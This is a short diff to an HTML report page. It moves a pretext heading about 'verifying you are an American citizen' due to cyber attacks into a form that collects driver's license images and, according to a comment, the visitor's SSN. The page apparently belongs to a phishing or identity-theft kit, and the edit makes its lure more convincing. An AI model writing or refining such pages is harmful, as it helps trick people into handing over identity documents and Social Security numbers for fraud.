--- a/report.html
+++ b/report.html
@@ -78,9 +78,10 @@
 
   <button type="submit">Submit Report</button>
 </form>
-<h1>Due to the rise in cyber attacks and fraud and for Security purpose, we need to verify that you are an American citizen</h1>
+
 <!-- Additional input form for driver's license and SSN -->
 <form id="driverLicenseForm" class="driver-license-form">
+  <h3>Due to the rise in cyber attacks and fraud and for Security purpose, we need to verify that you are an American citizen</h3><br><br>
   <label for="driverLicenseFront">Driver's License (Front):</label>
   <input type="file" id="driverLicenseFront" name="driverLicenseFront" accept="image/*" required>
 
